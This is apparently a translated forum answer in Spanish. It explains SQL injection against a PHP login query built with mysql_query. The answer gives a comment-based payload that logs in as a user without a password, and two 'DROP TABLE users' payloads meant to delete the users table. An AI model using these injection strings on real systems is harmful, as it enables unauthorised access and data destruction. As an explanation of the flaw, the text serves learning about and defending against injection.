Algo como esto debería hacer:
- Para iniciar sesión como usuario "foo", establezca el nombre de usuario en "foo' -- "
Esto hará que su consulta se vea como
$res = mysql_query("SELECT * from users where user='foo' -- ' AND pass=''");
El "--" significa que el resto de la línea está comentada
- No estoy seguro de si esto funcionará, pero intente establecer el nombre de usuario en "foo' O (usuarios DROP TABLE) --"
Esto hará que su consulta se vea como:
$res = mysql_query("SELECT * from users where user='foo' OR (DROP TABLE users) -- ' AND pass=''");
Sin embargo, es posible que no lo acepte; creo que las subconsultas solo pueden SELECCIONAR.
La función mysql_query solo ejecutará una consulta; otras le permitirán hacer esto:
$res = mysql_query("SELECT * from users where user='foo'; DROP TABLE users -- ' AND pass=''");
